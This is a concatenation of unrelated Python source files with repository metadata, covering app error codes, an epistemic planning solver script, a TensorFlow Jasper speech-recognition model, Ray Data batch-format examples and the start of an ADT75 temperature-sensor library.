USER_EXIST = ErrorEntry( 1104 ,u'该手机号已被注册')
REGISTER_ERR = ErrorEntry( 1105 ,u'网络连接失败,请检查网络')
NOT_DRIVER = ErrorEntry( 1106 ,u'请使用司机端APP注册')
PASSWD_ERR = ErrorEntry( 1107 ,u'原密码输入错误,请重新输入')
USER_NOT_ACTIVE = ErrorEntry( 1201 ,u'请修改初始密码')
NO_TNUMBER = ErrorEntry( 1302 ,u'运单不存在')
SMS_EXPIRE = ErrorEntry( 1303 ,u'验证码已过期, 请重新获取')
PARAMS_ERROR = ErrorEntry( 1304 ,u'参数类型错误')
SMS_ERROR = ErrorEntry( 1305 ,u'验证码错误,请重新输入')
SMS_SENDED = ErrorEntry( 1306 ,u'验证码已发送,请稍后再试')
TRANS_FINISHED = ErrorEntry( 1308 ,u'运单已完成,无法进行异常上报')
NO_LOCATION = ErrorEntry( 1401 ,u'没有此location编码')
DRIVER_QR_RELA_FAILED = ErrorEntry( 1501 ,u'绑定失败')
NO_TRUCK = ErrorEntry( 1601 ,u'未找到对应的车辆信息')
NO_QR_RS = ErrorEntry( 1701 ,u'未绑定车辆')
EXCEPTION_EXIST = ErrorEntry(1805, u'重复上报异常')
class ErrorDefsCarrier:
__ver__ =u'1.0'
__BASE__ = 30000
OK = ErrorEntry(1800,u'success')
SERVER_ERR = ErrorEntry(1801,u'server err!')
LOGIN_FAIL = ErrorEntry(1817,u'login fail!')
NOT_ALLOW = ErrorEntry(1803,u'not allow!')
COMMITED = ErrorEntry(1804,u'commited')
REGISTERED = ErrorEntry(1805,u'registered')
NO_USER = ErrorEntry(1806,u'no user')
METHOD_ERR = ErrorEntry(1807,u'method err!')
NO_DATA = ErrorEntry(1808,u'no data')
TEMP_TOKEN = ErrorEntry(1809,u'tmp token')
PASSWD_EXPIRE = ErrorEntry(1810,u'token expire')
DB_ERROR = ErrorEntry(1811,u'db err')
CHECKED = ErrorEntry(1812,u'已审核')
ADMIN_USER = ErrorEntry(1813,u'admin user')
NO_TOKEN = ErrorEntry(1814,u'NO TOKEN')
PASSWD_ERR = ErrorEntry(1816,u'passwd error!')
TOKEN_EXPIRE = ErrorEntry(1802,u'token expire!')
PARAMS_ERR = ErrorEntry(1818,u'params_err!')
NO_SHIPPER = ErrorEntry(1819,u'no shipper')
NO_MATCH_DATA = ErrorEntry(1820,u'no match data')
SHIPPER_NO_COMMIT = ErrorEntry(1821,u'shpper have no committed')
TRUCK_EXISTS = ErrorEntry(1822,u'truck exists')
errordefs = (ErrorDefsDispatcher,ErrorDefsCarrier,ErrorDefsDriver)
def reIndex():
for defs in errordefs:
kvs = hash_object( defs)
for k,v in kvs.items():
v.value+= defs.__BASE__
print defs,':',k,'=',v.value,v.comment
|
[
"24509826@qq.com"
] |
24509826@qq.com
|
4b63255fa149486950f043c7f04558b67ca41f7f
|
0c53c0a5dcd5b4a6e237fb034a9e9f544fdc7d20
|
/pdkb/planner.py
|
e1b0c18f8f7b96f634343efd4bab04a60aa3ffcc
|
[
"MIT"
] |
permissive
|
javiermtorres/pdkb-planning
|
4b379776ba42ac907c246d21a93e186c54926005
|
61a96c006b606aa051b2c7c9b5bfc9b6473d2a4d
|
refs/heads/master
| 2022-11-08T12:14:06.781734
| 2020-06-23T01:40:27
| 2020-06-23T01:40:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,599
|
py
|
import os, sys, time, pickle
from .actions import *
from .problems import *
def cleanup():
os.system('rm -f pdkb-domain.pddl')
os.system('rm -f pdkb-problem.pddl')
os.system('rm -f pdkb-plan.txt')
os.system('rm -f pdkb-plan.out')
os.system('rm -f pdkb-plan.out.err')
os.system('rm -f execution.details')
def solve(pdkbddl_file, old_planner=False):
print()
if not os.path.isdir('.problem-cache'):
os.mkdir('.problem-cache')
t_start = time.time()
print("Parsing problem...", end=' ')
sys.stdout.flush()
problem = parse_pdkbddl(pdkbddl_file)
print("done!")
print("Preprocessing problem...", end=' ')
sys.stdout.flush()
prob_hash = hash(pickle.dumps(problem))
fname = ".problem-cache/%s" % str(prob_hash)
if os.path.isfile(fname) and not os.path.isfile('.nocache'):
problem = pickle.load(open(fname, 'r'))
print("done! (from cache)")
else:
problem.preprocess()
with open(fname, 'wb') as f:
pickle.dump(problem, f, 2)
print("done!")
print("Solving problem...", end=' ')
sys.stdout.flush()
problem.solve(old_planner)
print("done!")
print("\nTime: %f s" % (time.time() - t_start))
problem.output_solution()
print()
if __name__ == '__main__':
if len(sys.argv) < 2:
print("\nUsage: python planner.py <pdkbddl file> [--keep-files] [--old-planner]\n")
sys.exit(1)
solve(sys.argv[1], old_planner=('--old-planner' in sys.argv))
if len(sys.argv) < 3 or '--keep-files' != sys.argv[2]:
cleanup()
|
[
"christian.muise@gmail.com"
] |
christian.muise@gmail.com
|
ca9140c6cb8e2ed05252aa84546a0ff0c9d29e76
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02717/s558364761.py
|
f30a185b94e4feeffd2e33ec0762827493b66b18
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51
|
py
|
x,y,z=map(str,input().split())
print(z+' '+x+' '+y)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
b15b600841eb13bf2e9d5b43e4e723ffc7e840dd
|
1b91fdcb79f8f6c1ea4713105512f68a161fe334
|
/tensorflow2/tf2cv/models/jasper.py
|
f064e3a442c085afb7af68eafd305bffce4ca588
|
[
"MIT"
] |
permissive
|
YoheiYamasaki/imgclsmob
|
fb28964eb42d5e536944d4a75e6dddaff58ce965
|
fbf1fe551a6bba763db7870ece057e5068edb984
|
refs/heads/master
| 2023-05-06T11:01:55.168785
| 2021-05-26T15:04:27
| 2021-05-26T15:04:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 29,749
|
py
|
"""
Jasper/DR for ASR, implemented in TensorFlow.
Original paper: 'Jasper: An End-to-End Convolutional Neural Acoustic Model,' https://arxiv.org/abs/1904.03288.
"""
__all__ = ['Jasper', 'jasper5x3', 'jasper10x4', 'jasper10x5', 'get_jasper']
import os
import tensorflow as tf
import tensorflow.keras.layers as nn
from .common import get_activation_layer, Conv1d, BatchNorm, DualPathSequential, DualPathParallelConcurent,\
is_channels_first
def conv1d1(in_channels,
out_channels,
strides=1,
groups=1,
use_bias=False,
data_format="channels_last",
**kwargs):
"""
1-dim kernel version of the 1D convolution layer.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int, default 1
Strides of the convolution.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
return Conv1d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
strides=strides,
groups=groups,
use_bias=use_bias,
data_format=data_format,
**kwargs)
class MaskConv1d(Conv1d):
"""
Masked 1D convolution block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
kernel_size : int or tuple/list of 1 int
Convolution window size.
strides : int or tuple/list of 1 int
Strides of the convolution.
padding : int or tuple/list of 1 int, default 0
Padding value for convolution layer.
dilation : int or tuple/list of 1 int, default 1
Dilation value for convolution layer.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
use_mask : bool, default True
Whether to use mask.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
strides,
padding=0,
dilation=1,
groups=1,
use_bias=False,
use_mask=True,
data_format="channels_last",
**kwargs):
super(MaskConv1d, self).__init__(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
strides=strides,
padding=padding,
dilation=dilation,
groups=groups,
use_bias=use_bias,
data_format=data_format,
**kwargs)
self.use_mask = use_mask
self.data_format = data_format
if self.use_mask:
self.kernel_size = kernel_size[0] if isinstance(kernel_size, (list, tuple)) else kernel_size
self.strides = strides[0] if isinstance(strides, (list, tuple)) else strides
self.padding = padding[0] if isinstance(padding, (list, tuple)) else padding
self.dilation = dilation[0] if isinstance(dilation, (list, tuple)) else dilation
def call(self, x, x_len):
if self.use_mask:
if is_channels_first(self.data_format):
max_len = x.shape[2]
mask = tf.cast(tf.linspace(0, max_len - 1, max_len), tf.int64) < x_len[0]
mask = tf.broadcast_to(tf.expand_dims(tf.expand_dims(mask, 0), 1), x.shape)
x = tf.where(mask, x, tf.zeros(x.shape))
else:
max_len = x.shape[1]
mask = tf.cast(tf.linspace(0, max_len - 1, max_len), tf.int64) < x_len[0]
mask = tf.broadcast_to(tf.expand_dims(tf.expand_dims(mask, 0), 2), x.shape)
x = tf.where(mask, x, tf.zeros(x.shape))
x_len = (x_len + 2 * self.padding - self.dilation * (self.kernel_size - 1) - 1) // self.strides + 1
x = super(MaskConv1d, self).call(x)
return x, x_len
def mask_conv1d1(in_channels,
out_channels,
strides=1,
groups=1,
use_bias=False,
data_format="channels_last",
**kwargs):
"""
Masked 1-dim kernel version of the 1D convolution layer.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int, default 1
Strides of the convolution.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
return MaskConv1d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
strides=strides,
groups=groups,
use_bias=use_bias,
data_format=data_format,
**kwargs)
class MaskConvBlock1d(nn.Layer):
"""
Masked 1D convolution block with batch normalization, activation, and dropout.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
kernel_size : int
Convolution window size.
strides : int
Strides of the convolution.
padding : int
Padding value for convolution layer.
dilation : int, default 1
Dilation value for convolution layer.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
use_bn : bool, default True
Whether to use BatchNorm layer.
bn_eps : float, default 1e-5
Small float added to variance in Batch norm.
activation : function or str or None, default 'relu'
Activation function or name of activation function.
dropout_rate : float, default 0.0
Parameter of Dropout layer. Faction of the input units to drop.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
strides,
padding,
dilation=1,
groups=1,
use_bias=False,
use_bn=True,
bn_eps=1e-5,
activation="relu",
dropout_rate=0.0,
data_format="channels_last",
**kwargs):
super(MaskConvBlock1d, self).__init__(**kwargs)
self.activate = (activation is not None)
self.use_bn = use_bn
self.use_dropout = (dropout_rate != 0.0)
self.conv = MaskConv1d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
strides=strides,
padding=padding,
dilation=dilation,
groups=groups,
use_bias=use_bias,
data_format=data_format,
name="conv")
if self.use_bn:
self.bn = BatchNorm(
epsilon=bn_eps,
data_format=data_format,
name="bn")
if self.activate:
self.activ = get_activation_layer(activation, name="activ")
if self.use_dropout:
self.dropout = nn.Dropout(
rate=dropout_rate,
name="dropout")
def call(self, x, x_len, training=None):
x, x_len = self.conv(x, x_len)
if self.use_bn:
x = self.bn(x, training=training)
if self.activate:
x = self.activ(x)
if self.use_dropout:
x = self.dropout(x, training=training)
return x, x_len
def mask_conv1d1_block(in_channels,
out_channels,
strides=1,
padding=0,
data_format="channels_last",
**kwargs):
"""
1-dim kernel version of the masked 1D convolution block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int, default 1
Strides of the convolution.
padding : int, default 0
Padding value for convolution layer.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
return MaskConvBlock1d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
strides=strides,
padding=padding,
data_format=data_format,
**kwargs)
class ChannelShuffle1d(nn.Layer):
"""
1D version of the channel shuffle layer.
Parameters:
----------
channels : int
Number of channels.
groups : int
Number of groups.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
def __init__(self,
channels,
groups,
data_format="channels_last",
**kwargs):
super(ChannelShuffle1d, self).__init__(**kwargs)
assert (channels % groups == 0)
self.groups = groups
self.data_format = data_format
def call(self, x, training=None):
x_shape = x.get_shape().as_list()
if is_channels_first(self.data_format):
channels = x_shape[1]
seq_len = x_shape[2]
else:
seq_len = x_shape[1]
channels = x_shape[2]
assert (channels % self.groups == 0)
channels_per_group = channels // self.groups
if is_channels_first(self.data_format):
x = tf.reshape(x, shape=(-1, self.groups, channels_per_group, seq_len))
x = tf.transpose(x, perm=(0, 2, 1, 3))
x = tf.reshape(x, shape=(-1, channels, seq_len))
else:
x = tf.reshape(x, shape=(-1, seq_len, self.groups, channels_per_group))
x = tf.transpose(x, perm=(0, 1, 3, 2))
x = tf.reshape(x, shape=(-1, seq_len, channels))
return x
def __repr__(self):
s = "{name}(groups={groups})"
return s.format(
name=self.__class__.__name__,
groups=self.groups)
class DwsConvBlock1d(nn.Layer):
"""
Depthwise version of the 1D standard convolution block with batch normalization, activation, dropout, and channel
shuffle.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
kernel_size : int
Convolution window size.
strides : int
Strides of the convolution.
padding : int
Padding value for convolution layer.
dilation : int, default 1
Dilation value for convolution layer.
groups : int, default 1
Number of groups.
use_bias : bool, default False
Whether the layer uses a bias vector.
use_bn : bool, default True
Whether to use BatchNorm layer.
bn_eps : float, default 1e-5
Small float added to variance in Batch norm.
activation : function or str or None, default 'relu'
Activation function or name of activation function.
dropout_rate : float, default 0.0
Parameter of Dropout layer. Faction of the input units to drop.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
strides,
padding,
dilation=1,
groups=1,
use_bias=False,
use_bn=True,
bn_eps=1e-5,
activation="relu",
dropout_rate=0.0,
data_format="channels_last",
**kwargs):
super(DwsConvBlock1d, self).__init__(**kwargs)
self.activate = (activation is not None)
self.use_bn = use_bn
self.use_dropout = (dropout_rate != 0.0)
self.use_channel_shuffle = (groups > 1)
self.dw_conv = MaskConv1d(
in_channels=in_channels,
out_channels=in_channels,
kernel_size=kernel_size,
strides=strides,
padding=padding,
dilation=dilation,
groups=in_channels,
use_bias=use_bias,
data_format=data_format,
name="dw_conv")
self.pw_conv = mask_conv1d1(
in_channels=in_channels,
out_channels=out_channels,
groups=groups,
use_bias=use_bias,
data_format=data_format,
name="pw_conv")
if self.use_channel_shuffle:
self.shuffle = ChannelShuffle1d(
channels=out_channels,
groups=groups,
data_format=data_format,
name="shuffle")
if self.use_bn:
self.bn = BatchNorm(
epsilon=bn_eps,
data_format=data_format,
name="bn")
if self.activate:
self.activ = get_activation_layer(activation, name="activ")
if self.use_dropout:
self.dropout = nn.Dropout(
rate=dropout_rate,
name="dropout")
def call(self, x, x_len, training=None):
x, x_len = self.dw_conv(x, x_len)
x, x_len = self.pw_conv(x, x_len)
if self.use_channel_shuffle:
x = self.shuffle(x)
if self.use_bn:
x = self.bn(x, training=training)
if self.activate:
x = self.activ(x)
if self.use_dropout:
x = self.dropout(x, training=training)
return x, x_len
class JasperUnit(nn.Layer):
"""
Jasper unit with residual connection.
Parameters:
----------
in_channels : int or list of int
Number of input channels.
out_channels : int
Number of output channels.
kernel_size : int
Convolution window size.
bn_eps : float
Small float added to variance in Batch norm.
dropout_rate : float
Parameter of Dropout layer. Faction of the input units to drop.
repeat : int
Count of body convolution blocks.
use_dw : bool
Whether to use depthwise block.
use_dr : bool
Whether to use dense residual scheme.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
bn_eps,
dropout_rate,
repeat,
use_dw,
use_dr,
data_format="channels_last",
**kwargs):
super(JasperUnit, self).__init__(**kwargs)
self.use_dropout = (dropout_rate != 0.0)
self.use_dr = use_dr
block_class = DwsConvBlock1d if use_dw else MaskConvBlock1d
if self.use_dr:
self.identity_block = DualPathParallelConcurent(name="identity_block")
for i, dense_in_channels_i in enumerate(in_channels):
self.identity_block.add(mask_conv1d1_block(
in_channels=dense_in_channels_i,
out_channels=out_channels,
bn_eps=bn_eps,
dropout_rate=0.0,
activation=None,
data_format=data_format,
name="block{}".format(i + 1)))
in_channels = in_channels[-1]
else:
self.identity_block = mask_conv1d1_block(
in_channels=in_channels,
out_channels=out_channels,
bn_eps=bn_eps,
dropout_rate=0.0,
activation=None,
data_format=data_format,
name="identity_block")
self.body = DualPathSequential(name="body")
for i in range(repeat):
activation = "relu" if i < repeat - 1 else None
dropout_rate_i = dropout_rate if i < repeat - 1 else 0.0
self.body.add(block_class(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
strides=1,
padding=(kernel_size // 2),
bn_eps=bn_eps,
dropout_rate=dropout_rate_i,
activation=activation,
data_format=data_format,
name="block{}".format(i + 1)))
in_channels = out_channels
self.activ = nn.ReLU()
if self.use_dropout:
self.dropout = nn.Dropout(
rate=dropout_rate,
name="dropout")
def call(self, x, x_len, training=None):
if self.use_dr:
x_len, y, y_len = x_len if type(x_len) is tuple else (x_len, None, None)
y = [x] if y is None else y + [x]
y_len = [x_len] if y_len is None else y_len + [x_len]
identity, _ = self.identity_block(y, y_len, training=training)
identity = tf.stack(identity, axis=1)
identity = tf.math.reduce_sum(identity, axis=1)
else:
identity, _ = self.identity_block(x, x_len, training=training)
x, x_len = self.body(x, x_len, training=training)
x = x + identity
x = self.activ(x)
if self.use_dropout:
x = self.dropout(x, training=training)
if self.use_dr:
return x, (x_len, y, y_len)
else:
return x, x_len
class JasperFinalBlock(nn.Layer):
"""
Jasper specific final block.
Parameters:
----------
in_channels : int
Number of input channels.
channels : list of int
Number of output channels for each block.
kernel_sizes : list of int
Kernel sizes for each block.
bn_eps : float
Small float added to variance in Batch norm.
dropout_rates : list of int
Dropout rates for each block.
use_dw : bool
Whether to use depthwise block.
use_dr : bool
Whether to use dense residual scheme.
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
def __init__(self,
in_channels,
channels,
kernel_sizes,
bn_eps,
dropout_rates,
use_dw,
use_dr,
data_format="channels_last",
**kwargs):
super(JasperFinalBlock, self).__init__(**kwargs)
self.use_dr = use_dr
conv1_class = DwsConvBlock1d if use_dw else MaskConvBlock1d
self.conv1 = conv1_class(
in_channels=in_channels,
out_channels=channels[-2],
kernel_size=kernel_sizes[-2],
strides=1,
padding=(2 * kernel_sizes[-2] // 2 - 1),
dilation=2,
bn_eps=bn_eps,
dropout_rate=dropout_rates[-2],
data_format=data_format,
name="conv1")
self.conv2 = MaskConvBlock1d(
in_channels=channels[-2],
out_channels=channels[-1],
kernel_size=kernel_sizes[-1],
strides=1,
padding=(kernel_sizes[-1] // 2),
bn_eps=bn_eps,
dropout_rate=dropout_rates[-1],
data_format=data_format,
name="conv2")
def call(self, x, x_len, training=None):
if self.use_dr:
x_len = x_len[0]
x, x_len = self.conv1(x, x_len, training=training)
x, x_len = self.conv2(x, x_len, training=training)
return x, x_len
class Jasper(tf.keras.Model):
"""
Jasper/DR/QuartzNet model from 'Jasper: An End-to-End Convolutional Neural Acoustic Model,'
https://arxiv.org/abs/1904.03288.
Parameters:
----------
channels : list of int
Number of output channels for each unit and initial/final block.
kernel_sizes : list of int
Kernel sizes for each unit and initial/final block.
bn_eps : float
Small float added to variance in Batch norm.
dropout_rates : list of int
Dropout rates for each unit and initial/final block.
repeat : int
Count of body convolution blocks.
use_dw : bool
Whether to use depthwise block.
use_dr : bool
Whether to use dense residual scheme.
in_channels : int, default 64
Number of input channels (audio features).
classes : int, default 29
Number of classification classes (number of graphemes).
data_format : str, default 'channels_last'
The ordering of the dimensions in tensors.
"""
def __init__(self,
channels,
kernel_sizes,
bn_eps,
dropout_rates,
repeat,
use_dw,
use_dr,
in_channels=64,
classes=29,
data_format="channels_last",
**kwargs):
super(Jasper, self).__init__(**kwargs)
self.in_size = None
self.in_channels = in_channels
self.classes = classes
self.data_format = data_format
self.features = DualPathSequential(name="features")
init_block_class = DwsConvBlock1d if use_dw else MaskConvBlock1d
self.features.add(init_block_class(
in_channels=in_channels,
out_channels=channels[0],
kernel_size=kernel_sizes[0],
strides=2,
padding=(kernel_sizes[0] // 2),
bn_eps=bn_eps,
dropout_rate=dropout_rates[0],
data_format=data_format,
name="init_block"))
in_channels = channels[0]
in_channels_list = []
for i, (out_channels, kernel_size, dropout_rate) in \
enumerate(zip(channels[1:-2], kernel_sizes[1:-2], dropout_rates[1:-2])):
in_channels_list += [in_channels]
self.features.add(JasperUnit(
in_channels=(in_channels_list if use_dr else in_channels),
out_channels=out_channels,
kernel_size=kernel_size,
bn_eps=bn_eps,
dropout_rate=dropout_rate,
repeat=repeat,
use_dw=use_dw,
use_dr=use_dr,
data_format=data_format,
name="unit{}".format(i + 1)))
in_channels = out_channels
self.features.add(JasperFinalBlock(
in_channels=in_channels,
channels=channels,
kernel_sizes=kernel_sizes,
bn_eps=bn_eps,
dropout_rates=dropout_rates,
use_dw=use_dw,
use_dr=use_dr,
data_format=data_format,
name="final_block"))
in_channels = channels[-1]
self.output1 = conv1d1(
in_channels=in_channels,
out_channels=classes,
use_bias=True,
data_format=data_format,
name="output1")
def call(self, x, x_len, training=None):
x, x_len = self.features(x, x_len, training=training)
x = self.output1(x)
return x, x_len
def get_jasper(version,
use_dw=False,
use_dr=False,
bn_eps=1e-3,
model_name=None,
pretrained=False,
root=os.path.join("~", ".tensorflow", "models"),
**kwargs):
"""
Create Jasper/DR/QuartzNet model with specific parameters.
Parameters:
----------
version : tuple of str
Model type and configuration.
use_dw : bool, default False
Whether to use depthwise block.
use_dr : bool, default False
Whether to use dense residual scheme.
bn_eps : float, default 1e-3
Small float added to variance in Batch norm.
model_name : str or None, default None
Model name for loading pretrained model.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
import numpy as np
blocks, repeat = tuple(map(int, version[1].split("x")))
main_stage_repeat = blocks // 5
model_type = version[0]
if model_type == "jasper":
channels_per_stage = [256, 256, 384, 512, 640, 768, 896, 1024]
kernel_sizes_per_stage = [11, 11, 13, 17, 21, 25, 29, 1]
dropout_rates_per_stage = [0.2, 0.2, 0.2, 0.2, 0.3, 0.3, 0.4, 0.4]
elif model_type == "quartznet":
channels_per_stage = [256, 256, 256, 512, 512, 512, 512, 1024]
kernel_sizes_per_stage = [33, 33, 39, 51, 63, 75, 87, 1]
dropout_rates_per_stage = [0.0] * 8
else:
raise ValueError("Unsupported Jasper family model type: {}".format(model_type))
stage_repeat = np.full((8,), 1)
stage_repeat[1:-2] *= main_stage_repeat
channels = sum([[a] * r for (a, r) in zip(channels_per_stage, stage_repeat)], [])
kernel_sizes = sum([[a] * r for (a, r) in zip(kernel_sizes_per_stage, stage_repeat)], [])
dropout_rates = sum([[a] * r for (a, r) in zip(dropout_rates_per_stage, stage_repeat)], [])
net = Jasper(
channels=channels,
kernel_sizes=kernel_sizes,
bn_eps=bn_eps,
dropout_rates=dropout_rates,
repeat=repeat,
use_dw=use_dw,
use_dr=use_dr,
**kwargs)
if pretrained:
if (model_name is None) or (not model_name):
raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.")
from .model_store import get_model_file
in_channels = kwargs["in_channels"] if ("in_channels" in kwargs) else 3
input_shape = (1,) + (in_channels,) + net.in_size if net.data_format == "channels_first" else\
(1,) + net.in_size + (in_channels,)
net.build(input_shape=input_shape)
net.load_weights(
filepath=get_model_file(
model_name=model_name,
local_model_store_dir_path=root))
return net
def jasper5x3(**kwargs):
"""
Jasper 5x3 model from 'Jasper: An End-to-End Convolutional Neural Acoustic Model,'
https://arxiv.org/abs/1904.03288.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_jasper(version=("jasper", "5x3"), model_name="jasper5x3", **kwargs)
def jasper10x4(**kwargs):
"""
Jasper 10x4 model from 'Jasper: An End-to-End Convolutional Neural Acoustic Model,'
https://arxiv.org/abs/1904.03288.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_jasper(version=("jasper", "10x4"), model_name="jasper10x4", **kwargs)
def jasper10x5(**kwargs):
"""
Jasper 10x5 model from 'Jasper: An End-to-End Convolutional Neural Acoustic Model,'
https://arxiv.org/abs/1904.03288.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
"""
return get_jasper(version=("jasper", "10x5"), model_name="jasper10x5", **kwargs)
def _test():
import numpy as np
import tensorflow.keras.backend as K
# data_format = "channels_last"
data_format = "channels_first"
pretrained = False
audio_features = 64
classes = 29
models = [
jasper5x3,
jasper10x4,
jasper10x5,
]
for model in models:
net = model(
in_channels=audio_features,
classes=classes,
pretrained=pretrained,
data_format=data_format)
batch = 3
seq_len = np.random.randint(60, 150)
# seq_len = 90
x = tf.random.normal((batch, audio_features, seq_len) if is_channels_first(data_format) else
(batch, seq_len, audio_features))
x_len = tf.convert_to_tensor(np.array([seq_len - 2], dtype=np.long))
y, y_len = net(x, x_len)
assert (y.shape.as_list()[0] == batch)
if is_channels_first(data_format):
assert (y.shape.as_list()[1] == classes)
assert (y.shape.as_list()[2] in [seq_len // 2, seq_len // 2 + 1])
else:
assert (y.shape.as_list()[1] in [seq_len // 2, seq_len // 2 + 1])
assert (y.shape.as_list()[2] == classes)
weight_count = sum([np.prod(K.get_value(w).shape) for w in net.trainable_weights])
print("m={}, {}".format(model.__name__, weight_count))
assert (model != jasper5x3 or weight_count == 107681053)
assert (model != jasper10x4 or weight_count == 261393693)
assert (model != jasper10x5 or weight_count == 322286877)
if __name__ == "__main__":
_test()
|
[
"osemery@gmail.com"
] |
osemery@gmail.com
|
bf0ab1c5d71cbb173fe840a0b6c59b8c19cfc5e2
|
ad0e853db635edc578d58891b90f8e45a72a724f
|
/doc/source/data/doc_code/batch_formats.py
|
2099f70e9bb80050091134df790645f849ed25d4
|
[
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] |
permissive
|
ericl/ray
|
8c93fc713af3b753215d4fe6221278700936e2db
|
e9a1c6d814fb1a81033809f56695030d651388f5
|
refs/heads/master
| 2023-08-31T11:53:23.584855
| 2023-06-07T21:04:28
| 2023-06-07T21:04:28
| 91,077,004
| 2
| 4
|
Apache-2.0
| 2023-01-11T17:19:10
| 2017-05-12T09:51:04
|
Python
|
UTF-8
|
Python
| false
| false
| 2,059
|
py
|
# flake8: noqa
# isort: skip_file
# fmt: off
# __simple_map_function_start__
import ray
ds = ray.data.read_csv("example://iris.csv")
def map_function(data):
return data[data["sepal.length"] < 5]
batch = ds.take_batch(10, batch_format="pandas")
mapped_batch = map_function(batch)
transformed = ds.map_batches(map_function, batch_format="pandas", batch_size=10)
# __simple_map_function_end__
# __simple_pandas_start__
import ray
import pandas as pd
ds = ray.data.read_csv("example://iris.csv")
ds.show(1)
# -> {'sepal.length': 5.1, ..., 'petal.width': 0.2, 'variety': 'Setosa'}
def transform_pandas(df_batch: pd.DataFrame) -> pd.DataFrame:
df_batch = df_batch[df_batch["variety"] == "Versicolor"]
df_batch.loc[:, "normalized.sepal.length"] = df_batch["sepal.length"] / df_batch["sepal.length"].max()
df_batch = df_batch.drop(columns=["sepal.length"])
return df_batch
ds.map_batches(transform_pandas, batch_format="pandas").show(1)
# -> {..., 'variety': 'Versicolor', 'normalized.sepal.length': 1.0}
# __simple_pandas_end__
# __simple_numpy_start__
from typing import Dict
import ray
import numpy as np
from typing import Dict
ds = ray.data.range_tensor(1000, shape=(2, 2))
def transform_numpy(arr: Dict[str, np.ndarray]) -> Dict[str, np.ndarray]:
arr["data"] = arr["data"] * 2
return arr
# test map function on a batch
batch = ds.take_batch(1)
mapped_batch = transform_numpy(batch)
ds.map_batches(transform_numpy)
# __simple_numpy_end__
# __simple_pyarrow_start__
import ray
import pyarrow as pa
import pyarrow.compute as pac
ds = ray.data.read_csv("example://iris.csv")
def transform_pyarrow(batch: pa.Table) -> pa.Table:
batch = batch.filter(pac.equal(batch["variety"], "Versicolor"))
return batch.drop(["sepal.length"])
# test map function on a batch
batch = ds.take_batch(1, batch_format="pyarrow")
mapped_batch = transform_pyarrow(batch)
ds.map_batches(transform_pyarrow, batch_format="pyarrow").show(1)
# -> {'sepal.width': 3.2, ..., 'variety': 'Versicolor'}
# __simple_pyarrow_end__
# fmt: on
|
[
"noreply@github.com"
] |
ericl.noreply@github.com
|
0080d6e109e103ff474bb678c4ce0d6365a10f90
|
0b2ae73bd91d843deb193d79b7c4eb02e900e851
|
/ADT75.py
|
b3bb7d6f5b3c37d352bc8f837b284d4d87f64082
|
[] |
no_license
|
ncdcommunity/Raspberry_pi_ADT75_Temperature_Sensor_Python_Library
|
c495d8db53f3d87585ab8a3eac883ede5dcd5bb4
|
e42bad0d5e057cf309d06b69b44b62ad4cca1da1
|
refs/heads/master
| 2021-09-05T15:16:24.670890
| 2018-01-29T07:03:01
| 2018-01-29T07:03:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,064
|
py
|
# Distributed with a free-will license.
# Use it any way you want, profit or free, provided it fits in the licenses of its associated works.
# ADT75
# This code is designed to work with the ADT75_I2CS I2C Mini Module available from ControlEverything.com.
